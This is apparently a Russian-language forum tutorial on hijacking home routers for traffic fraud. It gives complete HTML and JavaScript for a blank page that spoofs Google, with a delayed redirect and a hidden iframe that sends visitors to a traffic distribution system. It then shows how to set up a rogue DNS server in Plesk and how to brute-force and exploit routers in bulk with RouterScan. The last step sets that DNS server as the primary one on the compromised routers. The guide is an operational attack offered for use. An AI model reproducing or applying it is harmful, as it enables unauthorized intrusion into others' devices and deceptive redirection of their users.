Anon | 00500

Имя пользователя: Anon

Статус: Активен

Регистрация jabber:

Поток: Anon

TG канал: Канал для опретивных оповещений



Закрыть

Назад

DNS (Система Доменных Имен) - это система предоставляющая возможность узнать ип адрес ресурса по доменному имени. Когда ты вводишь в адресной строке браузера `ok.ru`, первым делом браузер отправляет запрос на получение ип адреса куда нужно отправить пакет. Можно создать свой днс сервер и указать его в параметрах подключения, тогда запросы будут отправляться ему. Схема резолвинга доменного имени такова: DNS кеш -> Системный файл hosts -> DNS сервер указанный в параметрах подключения.

Т.е. DNS нужен для того, чтобы хранить базу соответствия между IP-адресами и доменными именами. Эта система преобразует как доменные имена в IP-адреса, так и осуществляет обратное преобразование - из IP-адреса в доменное имя. Адрес DNS-сервера может прописываться в настройках подключения к интернету. Он может выдаваться автоматически. Если сервер DNS по какой-то причине вышел из строя, то соединение с интернетом не пострадает, но ни одно доменное имя не сможет быть преобразовано в IP-адрес. Проще говоря, при наборе доменного имени любого сайта в браузере, пользователю будет выдаваться ошибка.

Итог:

  • Нам нужна ТДС
  • Фишинговый сайт в котором будет скрипт редиректа с ожиданием.
    Сайт, конечно же, должен быть популярный. Это значит, что обращается к адресу данного сайта наш пользователь должен очень часто. К примеру: google, yahoo и тому подобное.
  • Панель сервера DNS при помощи которого будет осуществляется переход пользователя на сайт с редиректом.
  • Маршрутизаторы с которых будем сливать трафик.
    Для этого будем использовать RouterScan Mass.

Сайт

Будем использовать обычную пустую страничку, на которой будет задержка в 5 секунд. Этого достаточно для того, чтобы слить трафик на партнерку. В общем случае нам протребуется 2 сткрипта.

Вот пример первого скрипта:

<script language="JavaScript">


  var limit="0:3" // время в формате минуты : секунды

  if (document.images){

    var parselimit=limit.split(":");

    parselimit=parselimit[0]*60+parselimit[1]*1

  }

  function timerstart(){

    if (!document.images)

      return

    if (parselimit==1)

      window.location="https://www.google.co.uk/" // куда перекинуть

    else{

      parselimit-=1;

      setTimeout("timerstart()",1000)

    }

  }

</script>

И второго:

<script type="text/javascript">

  setTimeout(function(){

  location="https://www.google.co.uk/";

  }, 5000);

</script>

Сама страница полностью пустая, чтоб выглядеть как обычное окно, ожидающее вывода сайта. Вот готовый пример для страницы гугла:

<html>
<head>
    <title>Google</title>
    <link rel="shortcut icon" href="/images/favicon.png" type="image/png">
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
    <style type="text/css">
    body {
        background-color: #FAFDFF;
        margin: 0px;
        padding: 0px;
        font-size: 12px;
        color: #000;
        font-family: Georgia, Helvetica, sans-serif;
    }
    b {
        color: #00008B
    }
    .promo {
        color: #AF0032;
        font-size: 12px;
        text-align: center;
        margin-top: 20px
    }
    .promo a:link, .promo a:visited, .promo a:hover {
        color: #0066CC;
        text-decoration: underline;
    }
    </style>
</head>
    <script type="text/javascript">
        var limit = "0:3"
        if ( document.images ){
            var parselimit = limit.split(":")
            parselimit = parselimit[0] * 60 + parselimit[1] * 1
        }
        function timerstart(){
            if ( !document.images )
                return
            if ( parselimit == 1 )
                window.location = "https://www.google.co.uk/"
            else{
                parselimit -= 1
                setTimeout("timerstart()", 1000)
            }
        }
    </script>
    <script type="text/javascript"> 
        setTimeout(function(){ location = "https://www.google.co.uk/"; }, 5000);
    </script>
<body onLoad="timerstart()">
    <iframe width="0" height="0" frameborder="0" src="http://url/to/tds"></iframe>
</body>
</html>

Так же в данную страницу встраиваем iframe (или скрипт) для слива на ТДС, это можно увидеть в коде примера

<iframe width="0" height="0" frameborder="0" src="http://url/to/tds"></iframe>

Ну и конечно же, устанавливаем иконку гугла для вкладки, чтобы пользователь думал что чего от него ждет.

Панель DNS

Для начала требуется регистрация собственного DNS сервера, например https://www.cloudns.net/private-dns-servers/lang/ru/. Трафик сливается по средством попадания пользователя на ресурс, где скрыт скрипт на систему распределения трафика (ТДС) или напрямую в какую-либо партнерку. В данной теме рассмотрим панель Plesk - hosting panel. Предполагая, что ты приобретешь себе сервер с панелью управлением типа Plesk. Если у тебя будет другая панель, то разберешься по аналогии. Переходим в панель.

Затем открываем управление доменами и выбираем добавить домен. Как видишь у меня уже добавлен домен google для слива трафика.

В меню добавления доменов, вписываем домен, который часто посещает пользователь, при этом у данного домена должны быть и другие зоны помимо com. Это нужно чтобы скрипт редиректа перекинул пользователя именно на настоящий сайт, но в другой зоне. Почему? Потому что зону com занял ты своим фейком. На странице примера в коде, увидишь, что скрипт перекидывает пользователя на тот же гугл, но в другой доменной зоне. Добавим домен:

При добавлении домена нужно указать пользователя, который будет управлять этим доменом. После заполнения всех пунктов и добавления домена, будет выдан днс сервер. Посмотреть его можно нажав на созданный домен в разделе домены, где ты попадешь в меню настроек и других действий с сайтом. В этих настройках перейди в настройки DNS:

В настройках ДНС берешь ИП адрес сервера:

Запись "А", это твой ДНС сервер, который необходимо указать в парметрах для подмены сайта google. Ну и конечно же, нужно залить на сервер файлы фейка:

Всё! Фейк ДНС готов.

Собираем роутеры

Теперь нужно данный фейковый днс, установить на взломанных роутерах как первичный DNS и тогда пользователь при вводе в браузер адрес сайта google.com будет попадать на твой фейк. Да, и обязательно вторичный днс нужно указать настоящий, например от google это 8.8.4.4 или 8.8.8.8. Это сделать нужно обязательно. Потому что при поиске других сайтов, которых на нашем днс нет, будет обращение ко вторичному серверу для поиска этих доменов, а если его не будет, то и сайты не будут открываться, кроме нашего фейка.

Итак, займемся поиском роутеров, для подмены ДНС. Для этого будем использовать Route Scan. Запускаем сканер:

Теперь нужно добавить диапазоны и выбрать функцию брута роутеров и взлом эксплойтами, которые входят в набор данного софта. Дианазоны можно взять например тут. В комплекте также идет инструкция на русском в которой все подробно расписано.

Вбив диапазоны, жми старт и жди результатов.

После того как у тебя будут доступы, топай в настройки роутера и ставь им первичный днс.

После перехода в админку роутера, моделей которых куча и настройки у всех расположены по-разному. Ищи в настройках где указывается ДНС сервера и вставляй в первичный днс адрес своего сервера.

Сохрани настройки и всё. Теперь пользователь, при попытке попасть на сайт google, будет перенаправлен на твой фейк, где произойдёт слив трафика и редирект.